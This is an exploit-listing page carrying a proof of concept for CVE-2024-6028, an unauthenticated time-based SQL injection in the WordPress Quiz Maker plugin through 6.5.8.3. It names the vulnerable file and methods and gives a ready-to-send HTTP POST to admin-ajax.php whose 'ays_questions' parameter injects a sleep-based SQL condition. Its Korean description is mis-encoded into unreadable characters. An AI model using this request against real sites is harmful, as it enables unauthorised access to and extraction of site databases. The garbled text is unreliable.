## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GMH5225-CVE-2024-6028-POC
# CVE-2024-6028-Poc
CVE-2024-6028 Quiz Maker <= 6.5.8.3 - 'ays_questions' ๋งค๊ฐ๋ณ์๋ฅผ ํตํ ์ธ์ฆ๋์ง ์์ SQL ์ธ์ ์
## ์ค๋ช
WordPress์ฉ Quiz Maker ํ๋ฌ๊ทธ์ธ์ ๋ฒ์ 6.5.8.3๊น์ง (ํฌํจ)์ ๋ชจ๋ ๋ฒ์ ์์ 'ays_questions' ๋งค๊ฐ๋ณ์๋ฅผ ํตํด ์๊ฐ ๊ธฐ๋ฐ SQL ์ธ์ ์
์ ์ทจ์ฝํฉ๋๋ค. ์ด๋ ์ฌ์ฉ์ ์ ๊ณต ๋งค๊ฐ๋ณ์์ ๋ํ ์ด์ค์ผ์ดํ ์ฒ๋ฆฌ ๋ถ์กฑ๊ณผ ๊ธฐ์กด SQL ์ฟผ๋ฆฌ ์ค๋น ๋ถ์กฑ์ผ๋ก ์ธํด ๋ฐ์ํฉ๋๋ค. ์ด๋ก ์ธํด ์ธ์ฆ๋์ง ์์ ๊ณต๊ฒฉ์๊ฐ ๊ธฐ์กด ์ฟผ๋ฆฌ์ ์ถ๊ฐ SQL ์ฟผ๋ฆฌ๋ฅผ ์ฝ์
ํ์ฌ ๋ฐ์ดํฐ๋ฒ ์ด์ค์์ ๋ฏผ๊ฐํ ์ ๋ณด๋ฅผ ์ถ์ถํ ์ ์์ต๋๋ค.
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-maker/quiz-maker-6583-unauthenticated-sql-injection-via-ays-questions-parameter
ํ์ผ: wp-content/plugins/quiz-maker/public/class-quiz-maker-public.php
ํด๋์ค: Quiz_Maker_Public
์๋ ๊ณผ์ : ays_finish_quiz ๋ฉ์๋ -> get_questions_categories ๋ฉ์๋ image image image
## PoC
root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz